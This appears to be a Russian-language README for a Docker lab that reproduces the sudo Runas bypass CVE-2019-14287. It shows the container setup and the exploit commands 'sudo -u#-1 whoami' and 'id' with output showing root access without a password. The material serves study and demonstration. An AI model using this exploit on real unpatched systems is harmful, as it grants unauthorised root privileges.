
Docker-based PoC, демонстрирующий повышение привилегий sudo через обход ограничения пользователя Runas (CVE-2019-14287), с пошаговыми инструкциями по воспроизведению.
Пример воспроизведения уязвимости sudo (CVE-2019-14287) в Docker-контейнере.
docker compose up -ddocker exec -it vulnerable_sudo_app bashwhoami и id, чтобы убедиться, что вы обычный пользователь (не root)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami и sudo -u#0 id -u не выполняются
-u$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami и sudo -u#-1 id -u, чтобы убедиться, что команды выполняются от root без аутентификации (воспроизведение уязвимости)
-u#4294967295$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0